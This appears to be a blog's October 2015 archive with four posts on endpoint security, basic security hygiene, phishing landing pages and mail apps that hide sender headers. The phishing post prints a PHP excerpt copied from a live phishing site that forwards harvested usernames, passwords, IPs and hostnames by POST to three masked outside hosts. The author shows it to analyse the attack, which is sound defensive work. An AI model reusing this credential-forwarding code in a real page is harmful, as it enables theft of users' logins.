Monthly Archives: October 2015

The Rebirth of Endpoint Security

24 October 2015

Past Wednesday I listened to an interesting story on Information Week Dark Reading Radio. The half-hour show titled Endpoint Security Transformed is worth listening to. In her excellent post on the same subject Kelly Jackson Higgins, the host of the show, gives a great introduction to this emerging technology and market.

Endpoint protection has been poorly treated for many years. Focus was laid on detection. But the major attacks in the past years show that once the attacker got access to network this is not enough because insider threats are hardly to detect.

This quotation from Paul Calatayud, CISO of Surescripts, sums it up:

Endpoints are getting compromised, and their credentials get stolen. Then they become an insider threat.

Another statement from the show is very remarkable:

Most of the attacks exploit vulnerabilities which were already known, sometimes for more than a year.

This statement makes clear that we need entirely new provisioning and patching concepts, or sophisticated white listing methods to lock down the end-user systems. To apply e.g. just all Flash Player patches to thousands of computers is a nightmare and, extremely expensive.

Enjoy the show… and have a good weekend.

Cyber security innovation is crucial

17 October 2015

I had some unpleasant discussions this week about the importance of basic security. In my opinion most of the companies could raise their level of security by about 50 to 60 percent by just getting the basics right. The best Advanced Threat Protection (ATP) technology is useless once the attacker is on your network. Then it is important to hinder the attacker in searching the network for the credentials of the domain administrators.

Warwick Ashford’s post ‘Cyber security innovation is crucial, says security evangelist’, published on Tuesday on ComputerWeekly.com saved my day:

“Basic cyber hygiene is typically lacking, and just by getting the basics up to scratch companies could reduce 90% of their cyber risk

This report gives you great arguments for adjusting the budgets in favor for the basics. I hope you enjoy reading it.

Have a good weekend.

STOP.THINK.CONNECT

11 October 2015

The past week was full of exiting discoveries. I got some really well-crafted phishing emails. They used the same bizarre landing page design, but showed a somewhat different method in POST processing. Since one of the landing sites was open for everyone I had the chance to create a copy of the POST processing php procedure:

…
$data = "#$user#$pass#:#$ip#$browser#$hostname";
$sites=array("http://XXXXXX0.biz/usr.php","http://www.XXXXXXX1.com/usr.php","http://XXXXXXXX2.eu/usr.php");
function writeit($data,$site) { 
 global $textHos;
    $data = array('info' => $data);
    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
        ),
    );
    $context  = stream_context_create($options);
    $result = file_get_contents($site, false, $context);    
}
foreach ($sites as $site) {
    writeit($data,$site);
}

Most of the phishing sites I analyzed in the past months send an email message with username and password to the bad guys. In this case username and password are forwarded to 3 sites for further processing.

I checked the phishing landing pages with VirusTotal.com but found in most cases that the sites were not rated malicious. Even after 5 days only 10 of 65 scanners classify the pages as malicious or phishing site.

What surprised me was that most of the pages were listed on Blacklist databases. Check the landing page in a phishing mail with e.g. IP INDETAIL. It’s very likely that the site is already listed on a Blacklist.

And it’s really remarkable that browsers do not check blacklists before they direct the user to a phishing site. Information for making the world a safer place is abundant, unfortunately no one seems to be interested in creating actionable knowledge from it.

But there were also bright spots. I learned of the STOP.THINK.CONNECT campaign of the The Anti-Phishing Working Group (APWG) and National Cyber Security Alliance (NCSA). The campaign’s slogan is Keeping the web a safer place for everyone. The campaign provides lots of information about Two Factor Authentication and tips for safe usage of the internet. Take a look at the funny video clips.

Take care, and have a good week.

Mail apps facilitate phishing attacks

2 October 2015

Yesterday I received a really well-crafted phishing mail:

Phishing mail viewed in Windows Phone app

Windows Phone Mail App View

When viewed with mail apps on smartphones or tablets this well-made phishing mails look like the real thing.

Viewed with MS Outlook or a web mail client the sender information in the header makes it crystal clear that this email is a phishing attempt:

Phishing mail viewed in Outlook

Phishing mail viewed in Outlook

In my opinion most of the phishing attacks are easy to detect if email apps would offer the option to display at least the full <From> tag from the email header.

It’s hard to understand why Google, Apple and Microsoft make their customer’s life more difficult than necessary.

Have a good weekend!